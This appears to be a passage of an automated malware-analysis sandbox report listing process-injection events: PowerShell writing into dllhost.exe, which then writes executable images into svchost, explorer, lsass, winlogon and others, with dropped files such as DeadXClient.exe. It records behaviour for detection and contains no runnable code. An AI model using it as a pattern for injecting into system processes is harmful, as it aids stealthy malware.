                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8660000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAE1050000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 37B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2D49ABF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C8D4DC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15E7EC90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 15D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1370000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2E50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2CF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 14C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2F40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 11E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A10000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2580000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2DD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 8D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1190000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 22B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1100000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 980000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 900000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1140000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1020000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 590000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 770000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 25C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1260000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CE0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 610000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 840000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 910000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: A10000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 9C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3040000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 760000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 670000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 12A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 390000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 430000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2240000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3120000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: FA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1470000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadXClient.exe base: 1C560000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209CDA00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C9A4B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D056260000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC87A30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 1120000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 11C0000 value starts with: 4D5A
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4004 base: 8660000 value: 4D
                        Modifies the context of a thread in another process (thread injection)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5644
                        Writes to foreign memory regions
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 4DFBE7A010
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B080000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000
